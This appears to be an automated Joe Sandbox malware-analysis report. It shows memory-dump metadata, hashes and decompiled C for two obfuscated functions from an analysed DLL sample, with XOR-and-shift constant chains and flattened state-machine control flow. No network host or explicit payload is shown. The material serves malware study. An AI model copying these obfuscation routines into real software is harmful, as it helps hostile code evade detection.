                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: c/c$k9j$zm
                                                                                                                                                                            • API String ID: 0-1793526708
                                                                                                                                                                            • Opcode ID: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
                                                                                                                                                                            • Instruction ID: be0dcabe6878e1415e6c9b8b185a0d87881c0b5ef13f864393ffcd081e7d4f5d
                                                                                                                                                                            • Opcode Fuzzy Hash: d43419449e52b5cbd41cd5db91105e5f334013690b7b8493d0933a13370cd3ef
                                                                                                                                                                            • Instruction Fuzzy Hash: E8412372C0030AABCB04DFA5D94A5EEBBB2FF44314F108558E521A6260D7B49B14CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E02F6AD08() {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				char _v1040;
                                                                                                                                                                            				intOrPtr _v1044;
                                                                                                                                                                            				intOrPtr _v1048;
                                                                                                                                                                            				intOrPtr _v1052;
                                                                                                                                                                            				signed int _v1056;
                                                                                                                                                                            				signed int _v1060;
                                                                                                                                                                            				signed int _v1064;
                                                                                                                                                                            				signed int _v1068;
                                                                                                                                                                            				signed int _v1072;
                                                                                                                                                                            				signed int _v1076;
                                                                                                                                                                            				signed int _v1080;
                                                                                                                                                                            				signed int _v1084;
                                                                                                                                                                            				signed int _v1088;
                                                                                                                                                                            				signed int _v1092;
                                                                                                                                                                            				signed int _v1096;
                                                                                                                                                                            				signed int _v1100;
                                                                                                                                                                            				signed int _v1104;
                                                                                                                                                                            				signed int _v1108;
                                                                                                                                                                            				signed int _v1112;
                                                                                                                                                                            				signed int _v1116;
                                                                                                                                                                            				signed int _v1120;
                                                                                                                                                                            				signed int _v1124;
                                                                                                                                                                            				signed int _v1128;
                                                                                                                                                                            				signed int _v1132;
                                                                                                                                                                            				signed int _v1136;
                                                                                                                                                                            				signed int _v1140;
                                                                                                                                                                            				signed int _v1144;
                                                                                                                                                                            				void* _t263;
                                                                                                                                                                            				intOrPtr _t264;
                                                                                                                                                                            				intOrPtr _t267;
                                                                                                                                                                            				void* _t273;
                                                                                                                                                                            				void* _t277;
                                                                                                                                                                            				intOrPtr _t310;
                                                                                                                                                                            				signed int _t311;
                                                                                                                                                                            				signed int _t312;
                                                                                                                                                                            				signed int _t313;
                                                                                                                                                                            				signed int _t314;
                                                                                                                                                                            				signed int _t315;
                                                                                                                                                                            				signed int _t316;
                                                                                                                                                                            				signed int _t317;
                                                                                                                                                                            				signed int _t318;
                                                                                                                                                                            				signed int _t319;
                                                                                                                                                                            				signed int* _t322;
                                                                                                                                                                            
                                                                                                                                                                            				_t322 =  &_v1144;
                                                                                                                                                                            				_v1052 = 0x3e8be7;
                                                                                                                                                                            				_t310 = 0;
                                                                                                                                                                            				_t277 = 0xe4a3d19;
                                                                                                                                                                            				_v1048 = 0;
                                                                                                                                                                            				_v1044 = 0;
                                                                                                                                                                            				_v1100 = 0x8001b8;
                                                                                                                                                                            				_t311 = 0x1c;
                                                                                                                                                                            				_v1100 = _v1100 / _t311;
                                                                                                                                                                            				_v1100 = _v1100 + 0x9b02;
                                                                                                                                                                            				_v1100 = _v1100 ^ 0x0003825e;
                                                                                                                                                                            				_v1104 = 0x6ba50e;
                                                                                                                                                                            				_v1104 = _v1104 + 0x86a8;
                                                                                                                                                                            				_v1104 = _v1104 << 0xa;
                                                                                                                                                                            				_v1104 = _v1104 ^ 0xb0a58b81;
                                                                                                                                                                            				_v1064 = 0xa5f60f;
                                                                                                                                                                            				_v1064 = _v1064 ^ 0xf15b406a;
                                                                                                                                                                            				_v1064 = _v1064 ^ 0xf1fbbabe;
                                                                                                                                                                            				_v1116 = 0xfce2df;
                                                                                                                                                                            				_v1116 = _v1116 ^ 0xb7cf3da1;
                                                                                                                                                                            				_v1116 = _v1116 + 0x963f;
                                                                                                                                                                            				_v1116 = _v1116 ^ 0x6f9af2b2;
                                                                                                                                                                            				_v1116 = _v1116 ^ 0xd8ae206e;
                                                                                                                                                                            				_v1132 = 0x6fbbde;
                                                                                                                                                                            				_v1132 = _v1132 | 0xe49a2ecd;
                                                                                                                                                                            				_v1132 = _v1132 + 0xd857;
                                                                                                                                                                            				_v1132 = _v1132 + 0xffffaa9b;
                                                                                                                                                                            				_v1132 = _v1132 ^ 0xe507ae81;
                                                                                                                                                                            				_v1096 = 0xa4704d;
                                                                                                                                                                            				_v1096 = _v1096 + 0x7787;
                                                                                                                                                                            				_t312 = 0x67;
                                                                                                                                                                            				_v1096 = _v1096 / _t312;
                                                                                                                                                                            				_v1096 = _v1096 ^ 0x00025cd8;
                                                                                                                                                                            				_v1084 = 0x38937;
                                                                                                                                                                            				_t313 = 0x79;
                                                                                                                                                                            				_v1084 = _v1084 * 0x4f;
                                                                                                                                                                            				_v1084 = _v1084 ^ 0x5b1a1bbe;
                                                                                                                                                                            				_v1084 = _v1084 ^ 0x5a043b4e;
                                                                                                                                                                            				_v1136 = 0x1276ee;
                                                                                                                                                                            				_v1136 = _v1136 + 0xffffa0e4;
                                                                                                                                                                            				_v1136 = _v1136 + 0xffff74bb;
                                                                                                                                                                            				_v1136 = _v1136 << 2;
                                                                                                                                                                            				_v1136 = _v1136 ^ 0x0044c443;
                                                                                                                                                                            				_v1068 = 0xe79065;
                                                                                                                                                                            				_v1068 = _v1068 << 0xc;
                                                                                                                                                                            				_v1068 = _v1068 + 0xcbe6;
                                                                                                                                                                            				_v1068 = _v1068 ^ 0x7908daa4;
                                                                                                                                                                            				_v1088 = 0x9a4bed;
                                                                                                                                                                            				_v1088 = _v1088 + 0xfffff274;
                                                                                                                                                                            				_v1088 = _v1088 + 0xb36d;
                                                                                                                                                                            				_v1088 = _v1088 ^ 0x00951f6d;
                                                                                                                                                                            				_v1144 = 0x62e226;
                                                                                                                                                                            				_v1144 = _v1144 ^ 0x3dd3a3b2;
                                                                                                                                                                            				_v1144 = _v1144 >> 0xa;
                                                                                                                                                                            				_v1144 = _v1144 + 0xffff6a42;
                                                                                                                                                                            				_v1144 = _v1144 ^ 0x0008f37a;
                                                                                                                                                                            				_v1108 = 0x394fd6;
                                                                                                                                                                            				_v1108 = _v1108 * 0x13;
                                                                                                                                                                            				_v1108 = _v1108 / _t313;
                                                                                                                                                                            				_v1108 = _v1108 ^ 0x00080299;
                                                                                                                                                                            				_v1120 = 0x93d07f;
                                                                                                                                                                            				_v1120 = _v1120 << 0xa;
                                                                                                                                                                            				_t314 = 5;
                                                                                                                                                                            				_v1120 = _v1120 / _t314;
                                                                                                                                                                            				_v1120 = _v1120 ^ 0x44bcf5d7;
                                                                                                                                                                            				_v1120 = _v1120 ^ 0x4b68940f;
                                                                                                                                                                            				_v1072 = 0xc1f636;
                                                                                                                                                                            				_v1072 = _v1072 | 0x86bbf578;
                                                                                                                                                                            				_t315 = 0x47;
                                                                                                                                                                            				_v1072 = _v1072 * 0x24;
                                                                                                                                                                            				_v1072 = _v1072 ^ 0xfb68157e;
                                                                                                                                                                            				_v1080 = 0x3ac036;
                                                                                                                                                                            				_v1080 = _v1080 + 0xffffbaa8;
                                                                                                                                                                            				_v1080 = _v1080 ^ 0x136d94c6;
                                                                                                                                                                            				_v1080 = _v1080 ^ 0x1353f0eb;
                                                                                                                                                                            				_v1128 = 0xb3095e;
                                                                                                                                                                            				_v1128 = _v1128 / _t315;
                                                                                                                                                                            				_v1128 = _v1128 | 0xf7128eca;
                                                                                                                                                                            				_v1128 = _v1128 >> 0xc;
                                                                                                                                                                            				_v1128 = _v1128 ^ 0x0004e558;
                                                                                                                                                                            				_v1076 = 0x73500f;
                                                                                                                                                                            				_v1076 = _v1076 | 0x9d7bc413;
                                                                                                                                                                            				_v1076 = _v1076 + 0xffff6f55;
                                                                                                                                                                            				_v1076 = _v1076 ^ 0x9d72e045;
                                                                                                                                                                            				_v1124 = 0xc98916;
                                                                                                                                                                            				_v1124 = _v1124 + 0x2b72;
                                                                                                                                                                            				_v1124 = _v1124 | 0x4777986b;
                                                                                                                                                                            				_t316 = 0x69;
                                                                                                                                                                            				_v1124 = _v1124 / _t316;
                                                                                                                                                                            				_v1124 = _v1124 ^ 0x00ab5a68;
                                                                                                                                                                            				_v1140 = 0xc8b3ea;
                                                                                                                                                                            				_t317 = 0x7e;
                                                                                                                                                                            				_v1140 = _v1140 / _t317;
                                                                                                                                                                            				_v1140 = _v1140 | 0x89e2a6fa;
                                                                                                                                                                            				_v1140 = _v1140 >> 4;
                                                                                                                                                                            				_v1140 = _v1140 ^ 0x08902903;
                                                                                                                                                                            				_v1092 = 0x846906;
                                                                                                                                                                            				_v1092 = _v1092 | 0x1b02230c;
                                                                                                                                                                            				_v1092 = _v1092 + 0xffff209e;
                                                                                                                                                                            				_v1092 = _v1092 ^ 0x1b8bec31;
                                                                                                                                                                            				_v1056 = 0xaf8c32;
                                                                                                                                                                            				_t318 = 0x2e;
                                                                                                                                                                            				_v1056 = _v1056 / _t318;
                                                                                                                                                                            				_v1056 = _v1056 ^ 0x00017103;
                                                                                                                                                                            				_v1060 = 0x7e9355;
                                                                                                                                                                            				_v1060 = _v1060 >> 0x10;
                                                                                                                                                                            				_v1060 = _v1060 ^ 0x0008a840;
                                                                                                                                                                            				_v1112 = 0x76e6c0;
                                                                                                                                                                            				_v1112 = _v1112 ^ 0x1858c3ee;
                                                                                                                                                                            				_t319 = 0x68;
                                                                                                                                                                            				_v1112 = _v1112 / _t319;
                                                                                                                                                                            				_v1112 = _v1112 >> 7;
                                                                                                                                                                            				_v1112 = _v1112 ^ 0x000255a3;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t277 != 0xc59040) {
                                                                                                                                                                            						if(_t277 == 0x420aa66) {
                                                                                                                                                                            							_push(_v1084);
                                                                                                                                                                            							_push(_v1096);
                                                                                                                                                                            							_push(_v1132);
                                                                                                                                                                            							_t263 = E02F6E1F8(0x2f51000, _v1116, __eflags);
                                                                                                                                                                            							_t264 =  *0x2f76214; // 0x0
                                                                                                                                                                            							_t267 =  *0x2f76214; // 0x0
                                                                                                                                                                            							E02F72D0A(_v1068, __eflags, _t267 + 0x23c, _v1088, _v1144, _v1108, 0x2f51000,  &_v1040, _t264 + 0x34, _t263);
                                                                                                                                                                            							E02F6FECB(_t263, _v1120, _v1072, _v1080, _v1128);
                                                                                                                                                                            							_t322 =  &(_t322[0xe]);
                                                                                                                                                                            							_t277 = 0x835dcf5;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t277 == 0x835dcf5) {
                                                                                                                                                                            								_t273 = E02F6654A(_v1076, _v1124, __eflags,  &_v520, _v1140,  &_v1040);
                                                                                                                                                                            								_t322 =  &(_t322[3]);
                                                                                                                                                                            								__eflags = _t273;
                                                                                                                                                                            								_t310 =  !=  ? 1 : _t310;
                                                                                                                                                                            								_t277 = 0xb7cde49;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t277 == 0xb7cde49) {
                                                                                                                                                                            									E02F67A0F(_v1092,  &_v1040, _v1056, _v1060, _v1112);
                                                                                                                                                                            								} else {
                                                                                                                                                                            									if(_t277 != 0xe4a3d19) {
                                                                                                                                                                            										goto L10;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t277 = 0xc59040;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L13:
                                                                                                                                                                            						return _t310;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F70DB1(_v1100,  &_v520, __eflags, _v1104, _t277, _v1064);
                                                                                                                                                                            					_t322 =  &(_t322[3]);
                                                                                                                                                                            					_t277 = 0x420aa66;
                                                                                                                                                                            					L10:
                                                                                                                                                                            					__eflags = _t277 - 0xd159d29;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				goto L13;
                                                                                                                                                                            			}















































                                                                                                                                                                            0x02f6ad08
                                                                                                                                                                            0x02f6ad0e
                                                                                                                                                                            0x02f6ad1c
                                                                                                                                                                            0x02f6ad1e
                                                                                                                                                                            0x02f6ad23
                                                                                                                                                                            0x02f6ad27
                                                                                                                                                                            0x02f6ad2b
                                                                                                                                                                            0x02f6ad39
                                                                                                                                                                            0x02f6ad3e
                                                                                                                                                                            0x02f6ad44
                                                                                                                                                                            0x02f6ad4c
                                                                                                                                                                            0x02f6ad54
                                                                                                                                                                            0x02f6ad5c
                                                                                                                                                                            0x02f6ad64
                                                                                                                                                                            0x02f6ad69
                                                                                                                                                                            0x02f6ad71
                                                                                                                                                                            0x02f6ad79
                                                                                                                                                                            0x02f6ad81
                                                                                                                                                                            0x02f6ad89
                                                                                                                                                                            0x02f6ad91
                                                                                                                                                                            0x02f6ad99
                                                                                                                                                                            0x02f6ada1
                                                                                                                                                                            0x02f6ada9
                                                                                                                                                                            0x02f6adb1
                                                                                                                                                                            0x02f6adb9
                                                                                                                                                                            0x02f6adc1
                                                                                                                                                                            0x02f6adc9
                                                                                                                                                                            0x02f6add1
                                                                                                                                                                            0x02f6add9
                                                                                                                                                                            0x02f6ade1
                                                                                                                                                                            0x02f6aded
                                                                                                                                                                            0x02f6adf2
                                                                                                                                                                            0x02f6adf8
                                                                                                                                                                            0x02f6ae00
                                                                                                                                                                            0x02f6ae0d
                                                                                                                                                                            0x02f6ae0e
                                                                                                                                                                            0x02f6ae12
                                                                                                                                                                            0x02f6ae1a
                                                                                                                                                                            0x02f6ae22
                                                                                                                                                                            0x02f6ae2a
                                                                                                                                                                            0x02f6ae32
                                                                                                                                                                            0x02f6ae3a
                                                                                                                                                                            0x02f6ae3f
                                                                                                                                                                            0x02f6ae47
                                                                                                                                                                            0x02f6ae4f
                                                                                                                                                                            0x02f6ae54
                                                                                                                                                                            0x02f6ae5c
                                                                                                                                                                            0x02f6ae64
                                                                                                                                                                            0x02f6ae6c
                                                                                                                                                                            0x02f6ae74
                                                                                                                                                                            0x02f6ae7c
                                                                                                                                                                            0x02f6ae84
                                                                                                                                                                            0x02f6ae8c
                                                                                                                                                                            0x02f6ae94
                                                                                                                                                                            0x02f6ae99
                                                                                                                                                                            0x02f6aea1
                                                                                                                                                                            0x02f6aea9
                                                                                                                                                                            0x02f6aeb6
                                                                                                                                                                            0x02f6aec0
                                                                                                                                                                            0x02f6aec4
                                                                                                                                                                            0x02f6aecc
                                                                                                                                                                            0x02f6aed4
                                                                                                                                                                            0x02f6aee1
                                                                                                                                                                            0x02f6aee6
                                                                                                                                                                            0x02f6aeec
                                                                                                                                                                            0x02f6aef9
                                                                                                                                                                            0x02f6af06
                                                                                                                                                                            0x02f6af0e
                                                                                                                                                                            0x02f6af1b
                                                                                                                                                                            0x02f6af1e
                                                                                                                                                                            0x02f6af22
                                                                                                                                                                            0x02f6af2a
                                                                                                                                                                            0x02f6af32
                                                                                                                                                                            0x02f6af3a
                                                                                                                                                                            0x02f6af42
                                                                                                                                                                            0x02f6af4a
                                                                                                                                                                            0x02f6af5a
                                                                                                                                                                            0x02f6af5e
                                                                                                                                                                            0x02f6af66
                                                                                                                                                                            0x02f6af6b
                                                                                                                                                                            0x02f6af73
                                                                                                                                                                            0x02f6af7b
                                                                                                                                                                            0x02f6af83
                                                                                                                                                                            0x02f6af8b
                                                                                                                                                                            0x02f6af93
                                                                                                                                                                            0x02f6af9b
                                                                                                                                                                            0x02f6afa3
                                                                                                                                                                            0x02f6afaf
                                                                                                                                                                            0x02f6afb4
                                                                                                                                                                            0x02f6afba
                                                                                                                                                                            0x02f6afc2
                                                                                                                                                                            0x02f6afce
                                                                                                                                                                            0x02f6afd3
                                                                                                                                                                            0x02f6afd9
                                                                                                                                                                            0x02f6afe1
                                                                                                                                                                            0x02f6afe6
                                                                                                                                                                            0x02f6afee
                                                                                                                                                                            0x02f6aff6
                                                                                                                                                                            0x02f6affe
                                                                                                                                                                            0x02f6b006
                                                                                                                                                                            0x02f6b00e
                                                                                                                                                                            0x02f6b01a
                                                                                                                                                                            0x02f6b01f
                                                                                                                                                                            0x02f6b025
                                                                                                                                                                            0x02f6b02d
                                                                                                                                                                            0x02f6b035
                                                                                                                                                                            0x02f6b03a
                                                                                                                                                                            0x02f6b042
                                                                                                                                                                            0x02f6b04a
                                                                                                                                                                            0x02f6b056
                                                                                                                                                                            0x02f6b059
                                                                                                                                                                            0x02f6b05d
                                                                                                                                                                            0x02f6b062
                                                                                                                                                                            0x02f6b06a
                                                                                                                                                                            0x02f6b06a
                                                                                                                                                                            0x02f6b074
                                                                                                                                                                            0x02f6b0ca
                                                                                                                                                                            0x02f6b0d3
                                                                                                                                                                            0x02f6b0d7
                                                                                                                                                                            0x02f6b0df
                                                                                                                                                                            0x02f6b0e9
                                                                                                                                                                            0x02f6b108
                                                                                                                                                                            0x02f6b11b
                                                                                                                                                                            0x02f6b135
                                                                                                                                                                            0x02f6b13a
                                                                                                                                                                            0x02f6b13d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6b076
                                                                                                                                                                            0x02f6b07c
                                                                                                                                                                            0x02f6b0b3
                                                                                                                                                                            0x02f6b0ba
                                                                                                                                                                            0x02f6b0be
                                                                                                                                                                            0x02f6b0c0
                                                                                                                                                                            0x02f6b0c3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6b07e
                                                                                                                                                                            0x02f6b084
                                                                                                                                                                            0x02f6b187
                                                                                                                                                                            0x02f6b08a
                                                                                                                                                                            0x02f6b090
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6b096
                                                                                                                                                                            0x02f6b096
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6b096
                                                                                                                                                                            0x02f6b090
                                                                                                                                                                            0x02f6b084
                                                                                                                                                                            0x02f6b07c
                                                                                                                                                                            0x02f6b18f
                                                                                                                                                                            0x02f6b19b
                                                                                                                                                                            0x02f6b19b
                                                                                                                                                                            0x02f6b15b
                                                                                                                                                                            0x02f6b160
                                                                                                                                                                            0x02f6b163
                                                                                                                                                                            0x02f6b165
                                                                                                                                                                            0x02f6b165
                                                                                                                                                                            0x02f6b165
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: &b$r+
                                                                                                                                                                            • API String ID: 0-3016113347
                                                                                                                                                                            • Opcode ID: 6eb3ca35b7c21e634e3a830390c6e540c4c7168b7cd3d43a3fdd941d9fc8c62e
                                                                                                                                                                            • Instruction ID: 987f51ba0be608b451fd31ca35d9f8f8016c9f7f9123bfefdfd4a7e3d84327aa
                                                                                                                                                                            • Opcode Fuzzy Hash: 6eb3ca35b7c21e634e3a830390c6e540c4c7168b7cd3d43a3fdd941d9fc8c62e
                                                                                                                                                                            • Instruction Fuzzy Hash: E1C133B25083409FD3A8CF66C88951BFBF1FBD4798F108A1DF29696260D7B58949CF42
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                                            			E02F64F74() {
                                                                                                                                                                            				char _v524;
                                                                                                                                                                            				signed int _v528;
                                                                                                                                                                            				signed int _v532;
                                                                                                                                                                            				signed int _v536;
                                                                                                                                                                            				signed int _v540;
                                                                                                                                                                            				signed int _v544;
                                                                                                                                                                            				signed int _v548;
                                                                                                                                                                            				signed int _v552;
                                                                                                                                                                            				signed int _v556;
                                                                                                                                                                            				signed int _v560;
                                                                                                                                                                            				signed int _v564;
                                                                                                                                                                            				signed int _v568;
                                                                                                                                                                            				signed int _v572;
                                                                                                                                                                            				signed int _v576;
                                                                                                                                                                            				signed int _v580;
                                                                                                                                                                            				signed int _v584;
                                                                                                                                                                            				signed int _v588;
                                                                                                                                                                            				signed int _v592;
                                                                                                                                                                            				signed int _v596;
                                                                                                                                                                            				signed int _v600;
                                                                                                                                                                            				signed int _v604;
                                                                                                                                                                            				short* _t210;
                                                                                                                                                                            				void* _t211;
                                                                                                                                                                            				intOrPtr _t213;
                                                                                                                                                                            				void* _t217;
                                                                                                                                                                            				intOrPtr _t224;
                                                                                                                                                                            				signed int _t246;
                                                                                                                                                                            				signed int _t247;
                                                                                                                                                                            				signed int _t248;
                                                                                                                                                                            				signed int _t249;
                                                                                                                                                                            				signed int _t250;
                                                                                                                                                                            				signed int _t251;
                                                                                                                                                                            				signed int* _t254;
                                                                                                                                                                            
                                                                                                                                                                            				_t254 =  &_v604;
                                                                                                                                                                            				_v528 = 0xeac4cc;
                                                                                                                                                                            				_v528 = _v528 | 0xab847aec;
                                                                                                                                                                            				_t217 = 0x3550051;
                                                                                                                                                                            				_v528 = _v528 ^ 0xabe53c27;
                                                                                                                                                                            				_v564 = 0x85ed10;
                                                                                                                                                                            				_v564 = _v564 << 0xe;
                                                                                                                                                                            				_v564 = _v564 | 0x02c2a82c;
                                                                                                                                                                            				_v564 = _v564 ^ 0x7bc732f4;
                                                                                                                                                                            				_v548 = 0x432dfc;
                                                                                                                                                                            				_v548 = _v548 ^ 0x2e419a47;
                                                                                                                                                                            				_v548 = _v548 ^ 0x2e0248f0;
                                                                                                                                                                            				_v556 = 0x7b6619;
                                                                                                                                                                            				_t246 = 0x1c;
                                                                                                                                                                            				_v556 = _v556 / _t246;
                                                                                                                                                                            				_v556 = _v556 << 0x10;
                                                                                                                                                                            				_v556 = _v556 ^ 0x68371ab0;
                                                                                                                                                                            				_v568 = 0x76f94b;
                                                                                                                                                                            				_t247 = 7;
                                                                                                                                                                            				_v568 = _v568 / _t247;
                                                                                                                                                                            				_v568 = _v568 << 0xd;
                                                                                                                                                                            				_v568 = _v568 ^ 0x1fed9d10;
                                                                                                                                                                            				_v572 = 0x34fb4;
                                                                                                                                                                            				_t248 = 0xf;
                                                                                                                                                                            				_v572 = _v572 * 0x24;
                                                                                                                                                                            				_v572 = _v572 >> 0xa;
                                                                                                                                                                            				_v572 = _v572 ^ 0x0007943f;
                                                                                                                                                                            				_v536 = 0xc9a576;
                                                                                                                                                                            				_v536 = _v536 + 0xffff9d44;
                                                                                                                                                                            				_v536 = _v536 ^ 0x00c7b609;
                                                                                                                                                                            				_v596 = 0xae9ff5;
                                                                                                                                                                            				_v596 = _v596 + 0xffff6f16;
                                                                                                                                                                            				_v596 = _v596 / _t248;
                                                                                                                                                                            				_v596 = _v596 ^ 0xfe5a1390;
                                                                                                                                                                            				_v596 = _v596 ^ 0xfe515394;
                                                                                                                                                                            				_v588 = 0xa8ac90;
                                                                                                                                                                            				_t249 = 0x17;
                                                                                                                                                                            				_v588 = _v588 / _t249;
                                                                                                                                                                            				_v588 = _v588 << 4;
                                                                                                                                                                            				_v588 = _v588 + 0xfffff77b;
                                                                                                                                                                            				_v588 = _v588 ^ 0x007f9eed;
                                                                                                                                                                            				_v600 = 0xc58072;
                                                                                                                                                                            				_v600 = _v600 + 0xffffcbc9;
                                                                                                                                                                            				_v600 = _v600 << 4;
                                                                                                                                                                            				_v600 = _v600 * 0x72;
                                                                                                                                                                            				_v600 = _v600 ^ 0x7db93259;
                                                                                                                                                                            				_v604 = 0x4fbb0c;
                                                                                                                                                                            				_v604 = _v604 << 0xa;
                                                                                                                                                                            				_v604 = _v604 << 7;
                                                                                                                                                                            				_v604 = _v604 * 0x27;
                                                                                                                                                                            				_v604 = _v604 ^ 0xfda02730;
                                                                                                                                                                            				_v544 = 0x5fc89d;
                                                                                                                                                                            				_v544 = _v544 | 0x6496792e;
                                                                                                                                                                            				_v544 = _v544 ^ 0x64dc06aa;
                                                                                                                                                                            				_v580 = 0xa4bd54;
                                                                                                                                                                            				_v580 = _v580 + 0xffff47e7;
                                                                                                                                                                            				_v580 = _v580 >> 0x10;
                                                                                                                                                                            				_v580 = _v580 + 0xffff9f11;
                                                                                                                                                                            				_v580 = _v580 ^ 0xfff905b7;
                                                                                                                                                                            				_v560 = 0x8ec0a6;
                                                                                                                                                                            				_v560 = _v560 ^ 0x51bd2871;
                                                                                                                                                                            				_t250 = 0x75;
                                                                                                                                                                            				_v560 = _v560 / _t250;
                                                                                                                                                                            				_v560 = _v560 ^ 0x00b97c8d;
                                                                                                                                                                            				_v584 = 0x6990b8;
                                                                                                                                                                            				_v584 = _v584 ^ 0x9d650ba3;
                                                                                                                                                                            				_v584 = _v584 ^ 0x6675860f;
                                                                                                                                                                            				_v584 = _v584 + 0xffff1bcf;
                                                                                                                                                                            				_v584 = _v584 ^ 0xfb748c23;
                                                                                                                                                                            				_v592 = 0xef0f92;
                                                                                                                                                                            				_v592 = _v592 ^ 0x945975ed;
                                                                                                                                                                            				_v592 = _v592 + 0xffff8646;
                                                                                                                                                                            				_v592 = _v592 + 0xfffff2e1;
                                                                                                                                                                            				_v592 = _v592 ^ 0x94bb4d80;
                                                                                                                                                                            				_v552 = 0xcb75d7;
                                                                                                                                                                            				_t251 = 0x65;
                                                                                                                                                                            				_v552 = _v552 * 0x6f;
                                                                                                                                                                            				_v552 = _v552 ^ 0xe1e1c84b;
                                                                                                                                                                            				_v552 = _v552 ^ 0xb9d9c47b;
                                                                                                                                                                            				_v576 = 0x1cf321;
                                                                                                                                                                            				_v576 = _v576 + 0xffffc0e0;
                                                                                                                                                                            				_v576 = _v576 >> 0x10;
                                                                                                                                                                            				_v576 = _v576 << 7;
                                                                                                                                                                            				_v576 = _v576 ^ 0x000d9bab;
                                                                                                                                                                            				_v532 = 0x45ea0d;
                                                                                                                                                                            				_v532 = _v532 / _t251;
                                                                                                                                                                            				_v532 = _v532 ^ 0x000fbf52;
                                                                                                                                                                            				_v540 = 0x89573e;
                                                                                                                                                                            				_v540 = _v540 + 0xffffd980;
                                                                                                                                                                            				_v540 = _v540 ^ 0x008ac7ea;
                                                                                                                                                                            				do {
                                                                                                                                                                            					while(_t217 != 0x2095a83) {
                                                                                                                                                                            						if(_t217 == 0x3550051) {
                                                                                                                                                                            							_t217 = 0xca1b903;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t217 == 0xba5f136) {
                                                                                                                                                                            								_t210 = E02F609DD(_v560,  &_v524, _v584, _v592);
                                                                                                                                                                            								 *_t210 = 0;
                                                                                                                                                                            								_t217 = 0x2095a83;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t260 = _t217 - 0xca1b903;
                                                                                                                                                                            								if(_t217 == 0xca1b903) {
                                                                                                                                                                            									_push(_v556);
                                                                                                                                                                            									_push(_v548);
                                                                                                                                                                            									_push(_v564);
                                                                                                                                                                            									_t211 = E02F6E1F8(0x2f51000, _v528, _t260);
                                                                                                                                                                            									_t224 =  *0x2f76214; // 0x0
                                                                                                                                                                            									_t213 =  *0x2f76214; // 0x0
                                                                                                                                                                            									E02F72D0A(_v572, _t260, _t213 + 0x23c, _v536, _v596, _v588, _t224 + 0x34,  &_v524, _t224 + 0x34, _t211);
                                                                                                                                                                            									_t210 = E02F6FECB(_t211, _v600, _v604, _v544, _v580);
                                                                                                                                                                            									_t254 =  &(_t254[0xe]);
                                                                                                                                                                            									_t217 = 0xba5f136;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L9;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F6437A(E02F6BEFD, _v552, _v576, _v532, _v540, 0,  &_v524,  &_v524);
                                                                                                                                                                            					_t254 =  &(_t254[6]);
                                                                                                                                                                            					_t217 = 0x9325c58;
                                                                                                                                                                            					L9:
                                                                                                                                                                            					__eflags = _t217 - 0x9325c58;
                                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                                            				return _t210;
                                                                                                                                                                            			}




































                                                                                                                                                                            0x02f64f74
                                                                                                                                                                            0x02f64f7a
                                                                                                                                                                            0x02f64f84
                                                                                                                                                                            0x02f64f8c
                                                                                                                                                                            0x02f64f91
                                                                                                                                                                            0x02f64f99
                                                                                                                                                                            0x02f64fa1
                                                                                                                                                                            0x02f64fa6
                                                                                                                                                                            0x02f64fae
                                                                                                                                                                            0x02f64fb6
                                                                                                                                                                            0x02f64fbe
                                                                                                                                                                            0x02f64fc6
                                                                                                                                                                            0x02f64fce
                                                                                                                                                                            0x02f64fe0
                                                                                                                                                                            0x02f64fe5
                                                                                                                                                                            0x02f64feb
                                                                                                                                                                            0x02f64ff0
                                                                                                                                                                            0x02f64ff8
                                                                                                                                                                            0x02f65004
                                                                                                                                                                            0x02f65009
                                                                                                                                                                            0x02f6500f
                                                                                                                                                                            0x02f65014
                                                                                                                                                                            0x02f6501c
                                                                                                                                                                            0x02f65029
                                                                                                                                                                            0x02f6502c
                                                                                                                                                                            0x02f65030
                                                                                                                                                                            0x02f65035
                                                                                                                                                                            0x02f6503d
                                                                                                                                                                            0x02f65045
